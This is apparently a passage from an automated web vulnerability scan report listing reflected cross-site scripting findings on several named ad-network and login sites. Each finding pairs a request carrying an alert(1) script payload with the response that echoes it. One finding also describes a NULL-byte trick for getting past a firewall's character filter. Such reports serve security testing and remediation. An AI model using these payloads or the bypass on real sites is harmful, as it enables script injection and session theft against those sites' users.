<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?name=stark_jayson&amp;id=6154671&amp;3a47a"><script>alert(1)</script>c61540aaab8=1&amp;action=login&amp;appRedirect=http://insider.espn.go.com/mlb/blog?name=stark_jayson&id=6154671&3a47a">
...[SNIP]...

3.253. http://int.teracent.net/tase/int [PartNumber parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The value of the PartNumber request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4de63"><script>alert(1)</script>8ed7d96827 was submitted in the PartNumber parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/int?adv=150&fmt=html&sec=0&pid=prod&version=2&tier1=Accessories&tier2=Sunglasses&PartNumber=4de63"><script>alert(1)</script>8ed7d96827&url=http%3A//www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en%3Ft1Id%3D68%26t2Id%3D5000000000000013515%26tier%3D2%26langId%3D-1%26storeId%3D10551%26storeId%3D10551%26catalogId%3D10051%26cid%3DPPGL0055%26bannerCode%3DPPGL0055%26viewTaskName%3DCOABannerCodeDirectorCmd&rnd=741126674693077.8 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en?t1Id=68&t2Id=5000000000000013515&tier=2&langId=-1&storeId=10551&storeId=10551&catalogId=10051&cid=PPGL0055&bannerCode=PPGL0055&viewTaskName=COABannerCodeDirectorCmd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=Mwf8VEP.X2PRIV; imp=a$150#1303349107011_23701916_as2101_imp|le#1303349107011_23701916_as2101_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p150r=b$u-84#A.7Oy|c-t1_3X0PNEA9Ju0#2.7Oy|c-t2_3jnoWyampnx#2.7Oy|i-4de63"><script>alert(1)</script>8ed7d96827#1.7Oy|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/
Set-Cookie: imp=a$le#1303350102507_32482849_ap2102_int|150#1303349107011_23701916_as2101_imp|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:41:42 GMT
Connection: close
Content-Length: 538

<html><head></head><body>
<img src="https://ad.yieldmanager.com/pixel?id=595473&t=2" width="0" height="0" border="0" alt=""/><img src="https://coh.netmng.com/pixel/?aid=128&tax=Accessories/Sunglasses/4de63"><script>alert(1)</script>8ed7d96827" width="1" height="1" border="0" />
...[SNIP]...

3.254. http://int.teracent.net/tase/int [tier1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The value of the tier1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f028"><script>alert(1)</script>70df8c47823 was submitted in the tier1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/int?adv=150&fmt=html&sec=0&pid=prod&version=2&tier1=Accessories8f028"><script>alert(1)</script>70df8c47823&tier2=Sunglasses&PartNumber=&url=http%3A//www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en%3Ft1Id%3D68%26t2Id%3D5000000000000013515%26tier%3D2%26langId%3D-1%26storeId%3D10551%26storeId%3D10551%26catalogId%3D10051%26cid%3DPPGL0055%26bannerCode%3DPPGL0055%26viewTaskName%3DCOABannerCodeDirectorCmd&rnd=741126674693077.8 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en?t1Id=68&t2Id=5000000000000013515&tier=2&langId=-1&storeId=10551&storeId=10551&catalogId=10051&cid=PPGL0055&bannerCode=PPGL0055&viewTaskName=COABannerCodeDirectorCmd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=Mwf8VEP.X2PRIV; imp=a$150#1303349107011_23701916_as2101_imp|le#1303349107011_23701916_as2101_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p150r=b$u-84#A.7Oy|c-t1_3X0PNEA9Ju0#1.7Oy|c-t2_3jnoWyampnx#1.7Oy|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/
Set-Cookie: imp=a$le#1303350102130_32426742_ap2105_int|150#1303349107011_23701916_as2101_imp|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:41:41 GMT
Connection: close
Content-Length: 539

<html><head></head><body>
<img src="https://ad.yieldmanager.com/pixel?id=595473&t=2" width="0" height="0" border="0" alt=""/><img src="https://coh.netmng.com/pixel/?aid=128&tax=Accessories8f028"><script>alert(1)</script>70df8c47823/Sunglasses/" width="1" height="1" border="0" />
...[SNIP]...

3.255. http://int.teracent.net/tase/int [tier2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The value of the tier2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f755c"><script>alert(1)</script>65f0b1025fc was submitted in the tier2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/int?adv=150&fmt=html&sec=0&pid=prod&version=2&tier1=Accessories&tier2=Sunglassesf755c"><script>alert(1)</script>65f0b1025fc&PartNumber=&url=http%3A//www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en%3Ft1Id%3D68%26t2Id%3D5000000000000013515%26tier%3D2%26langId%3D-1%26storeId%3D10551%26storeId%3D10551%26catalogId%3D10051%26cid%3DPPGL0055%26bannerCode%3DPPGL0055%26viewTaskName%3DCOABannerCodeDirectorCmd&rnd=741126674693077.8 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en?t1Id=68&t2Id=5000000000000013515&tier=2&langId=-1&storeId=10551&storeId=10551&catalogId=10051&cid=PPGL0055&bannerCode=PPGL0055&viewTaskName=COABannerCodeDirectorCmd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=Mwf8VEP.X2PRIV; imp=a$150#1303349107011_23701916_as2101_imp|le#1303349107011_23701916_as2101_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p150r=b$u-84#A.7Oy|c-t1_3X0PNEA9Ju0#2.7Oy|c-t2_3jnoWyampnx#1.7Oy|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/
Set-Cookie: imp=a$le#1303350102303_32483167_ap2100_int|150#1303349107011_23701916_as2101_imp|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:41:42 GMT
Connection: close
Content-Length: 539

<html><head></head><body>
<img src="https://ad.yieldmanager.com/pixel?id=595473&t=2" width="0" height="0" border="0" alt=""/><img src="https://coh.netmng.com/pixel/?aid=128&tax=Accessories/Sunglassesf755c"><script>alert(1)</script>65f0b1025fc/" width="1" height="1" border="0" />
...[SNIP]...

3.256. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload cf10e<script>alert(1)</script>8303423482d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07608cf10e<script>alert(1)</script>8303423482d HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout; NETOPTOUT=true; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6m1V1Ju34wt0NSA6Qb/nOtMHg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 19 Apr 2011 16:04:52 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 20 Apr 2011 16:04:52 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Apr 2011 16:04:52 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07608CF10E<SCRIPT>ALERT(1)</SCRIPT>8303423482D" was not recognized.
*/

3.257. https://login.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://login.barracudanetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00185a3"><a>0b39656ae9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 185a3"><a>0b39656ae9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%00185a3"><a>0b39656ae9=1 HTTP/1.1
Host: login.barracudanetworks.com
Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 14:38:30 GMT
Server: Apache
Set-Cookie: CLOUD_LOCALE=en_US; expires=Thu, 25-Aug-2011 14:38:30 GMT; path=/; domain=.barracudanetworks.com
Set-Cookie: cloud_session=0mbv4o4u95latiga7u03i7e414; path=/; domain=.barracudanetworks.com
Expires: Fri, 26 Feb 2010 09:38:30 -0500
Cache-Control: no-store
Pragma: no-cache
Set-Cookie: cloud_session=0mbv4o4u95latiga7u03i7e414; path=/; domain=.barracudanetworks.com
X-Cloud-Auth: 0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 5832

<!DOCTYPE html>
<!-- Portal Version 11.02 29121 -->
<html>
   <head>
       <meta charset="UTF-8">
       <meta http-equiv="Content-Version" content="1.1.0">
       <title>Sign In > Barracuda Networks</title>
       
       <li
...[SNIP]...
<a href="/new_account/?service=https://login.barracudanetworks.com/?%00185a3"><a>0b39656ae9=1">
...[SNIP]...

3.258. http://mf.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66e3a'%3balert(1)//54509da0ddf was submitted in the h parameter. This input was echoed as 66e3a';alert(1)//54509da0ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0384790&w=300&h=25066e3a'%3balert(1)//54509da0ddf&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:39 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQ
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25066e3a';alert(1)//54509da0ddf" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.259. http://mf.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9c45"%3balert(1)//f523be3e8b3 was submitted in the pid parameter. This input was echoed as e9c45";alert(1)//f523be3e8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0384790e9c45"%3balert(1)//f523be3e8b3&w=300&h=250&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:35 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790e9c45";alert(1)//f523be3e8b3&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAu
...[SNIP]...

3.260. http://mf.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 934f2'%3balert(1)//25e8b63311e was submitted in the w parameter. This input was echoed as 934f2';alert(1)//25e8b63311e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0384790&w=300934f2'%3balert(1)//25e8b63311e&h=250&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:37 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQ
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300934f2';alert(1)//25e8b63311e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.261. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57401"><script>alert(1)</script>c45cd3456f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM57401"><script>alert(1)</script>c45cd3456f/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
